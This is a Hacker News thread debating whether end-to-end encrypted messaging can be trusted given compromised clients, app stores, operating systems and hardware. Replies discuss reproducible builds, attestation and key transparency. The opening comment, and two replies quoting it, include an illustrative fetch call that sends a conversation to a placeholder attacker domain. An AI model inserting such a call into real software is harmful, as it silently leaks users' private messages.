logoalt Hacker News

parhamnlast Wednesday at 9:54 PM9 repliesview on HN

One thing I'm realizing more and more (I've been building an encrypted AI chat service which is powered by encrypted CRDTs) is that "E2E encryption" really requires the client to be built and verified by the end user. I mean end of the day you can put a one-line fetch/analytics-tracker/etc on the rendering side and everything your protocol claimed to do becomes useless. That even goes further to the OS that the rendering is done on.

The last bit adds an interesting facet, even if you manage to open source the client and manage to make it verifiably buildable by the user, you still need to distribute it on the iOS store. Anything can happen in the publish process. I use iOS as the example because its particularly tricky to load your own build of an application.

And then if you did that, you still need to do it all on the other side of the chat too, assuming its a multi party chat.

You can have every cute protocol known to man, best encryption algorithms on the wire, etc but end of the day its all trust.

I mention this because these days I worry more that using something like signal actually makes you a target for snooping under the false guise that you are in a totally secure environment. If I were a government agency with intent to snoop I'd focus my resources on Signal users, they have the most to hide.

Sometimes it all feels pointless (besides encrypted storage).

I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?


Replies

inor0gulast Wednesday at 10:05 PM

You will always have to root your trust in something, assuming you cannot control the entire pipeline from the sand that becomes the CPU silicone, through the OS and all the way to how packets are forwarded from you to the person on the other end.

This makes that entire goal moot; eliminating trust thus seems impossible, you're just shifting around the things you're willing to trust, or hide them behind an abstraction.

I think what will become more important is to have enough mechanisms to be able to categorically prove if an entity you trust to a certain extent is acting maliciously, and hold them accountable. If economic incentives are not enough to trust a "big guy", what remains is to give all the "little guys" a good enough loudspeaker to point distrust.

A few examples: - certificate transparency logs so your traffic is not MitM'ed - reproducible builds so the binary you get matches the public open source code you expect it does (regardless of its quality) - key transparency, so when you chat with someone on WhatsApp/Signal/iMessage you actually get the public keys you expect and not the NSA's

show 1 reply
BrenBarnlast Thursday at 7:28 AM

I agree with you that the cart seems to be moving ahead of the horse, in that there is an increasing fixation on the theoretical status of the encryption scheme rather than the practical risk of various outcomes. An important facet of this is that systems that attempt to be too secure will prevent users from reading their own messages and hence will induce those users to use "less secure" systems. (This has been a problem on Matrix, where clients have often not clearly communicated to users that logging out can result in permanently missed messages.)

There's a part of me that wonders whether some of the more hardcore desiderata like perfect forward secrecy are, in practical terms, incompatible with what users want from messaging. What users want is "I can see all of my own messages whenever I want to and no one else can ever see any of them." This is very hard to achieve. There is a fundamental tension between "security" and things like password resets or "lost my phone" recovery.

I think if people fully understood the full range of possible outcomes, a fair number wouldn't actually want the strongest E2EE protection. Rather, what they want are promises on a different plane, such as ironclad legal guarantees (an extreme example being something like "if someone else looks at my messages they will go to jail for life"). People who want the highest level of technical security may have different priorities, but designing the systems for those priorities risks a backlash from users who aren't willing to accept those tradeoffs.

show 1 reply
lmmlast Thursday at 1:15 AM

> Sometimes it all feels pointless

Building anything that's meant to be properly secure - secure enough that you worry about the distinction between E2E encryption and client-server encryption - on top of iOS and Google Play Services is IMO pretty pointless yes. People who care about their security to that extent will put in the effort to use something other than an iPhone. (The way that Signal promoters call people who use cryptosystems they don't like LARPers is classic projection; there's no real threat model for which Signal actually makes sense, except maybe if you work for the US government).

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

There's definitely a streetlight effect where academic cryptography researchers focus on the mathematical algorithms. Nowadays the circle of what you can get funding to do security research on is a little wider (toy models of the end to end messaging protocol, essentially) but still not enough to encompass the full human-to-human part that actually matters.

MediumOwllast Thursday at 1:29 PM

> I also feel weird that the bulk of the discussion is on hypothetical validity of a security protocol usually focused on the maths, when all of that can be subverted with a fetch("https://malvevolentactor.com", {body: JSON.stringify(convo)}) at the rendering layer. Anyone have any thoughts on this?

I think your comment in general, and this part in particular, forgets what was the state of telecommunications 10-15 years ago. Nothing was encrypted. Doing anything on a public wifi was playing russian roulette, and signal intelligence agencies were having the time of their lives.

The issues you are highlighting _are_ present, of course; they were just of a lower priority than network encryption.

redleader55last Wednesday at 11:41 PM

I think that part of what you are talking about is sometimes called "attestation". Basically a signature, with a root that you trust that confirms beyond doubt the provenience of the entity (phone + os + app) that you interact with.

Android has that and can confirm to a third party if the phone is running for example a locked bootloader with a Google signature and a Google OS. It's technically possible to have a different chain of trust and get remote parties to accept a Google phone + a Lineage OS(an example) "original" software.

The last part is the app. You could in theory attest the signature on the app, which the OS has access to and could provide to the remote party if needed.

A fully transparent attested artifact, which doesn't involve blind trust in a entity like Google, would use a ledger with hashes and binaries of the components being attested, instead of root of trust of signatures.

All of the above are technically possible, but not implemented today in such a way to make this feasible. I'm confident that with enough interest this will be eventually implemented.

solarkraftlast Thursday at 8:49 AM

> "E2E encryption" really requires the client to be built and verified by the end user

We probably agree that this is infeasible for the vast majority of people.

Luckily reproducible builds somewhat sidestep this in a more practical way.

edgineerlast Thursday at 6:19 AM

I'll feel pessimistic like this, but then something like Tinfoil Chat [0] comes along and sparks my interest again. It's still all just theoretical to me, but at least I don't feel so bad about things.

With a little bit of hardware you could get a lot of assurance back: "Optical repeater inside the optocouplers of the data diode enforce direction of data transmission with the fundamental laws of physics."

[0] https://github.com/maqp/tfc

aembletonlast Thursday at 9:11 AM

> "E2E encryption" really requires the client to be built and verified by the end user

But the OS might be compromised with a screen recorder or a keylogger. You'd need the full client, OS and hardware to be built by the end user. But then the client that they're sending to might be compromised... Or even that person might be compromised.

At the end of the day you have to put your trust somewhere, otherwise you can never communicate.

SheinhardtWigColast Wednesday at 10:07 PM

It’s primarily to guard against insider threats - E2E makes it very hard for one Signal employee to obtain everyone’s chat transcripts.

Anyone whose threat model includes well-resourced actors (like governments) should indeed be building their communications software from source in a trustworthy build environment. But then of course you still have to trust the hardware.

tl;dr: E2E prevents some types of attacks, and makes some others more expensive; but if a government is after you, you’re still toast.

show 1 reply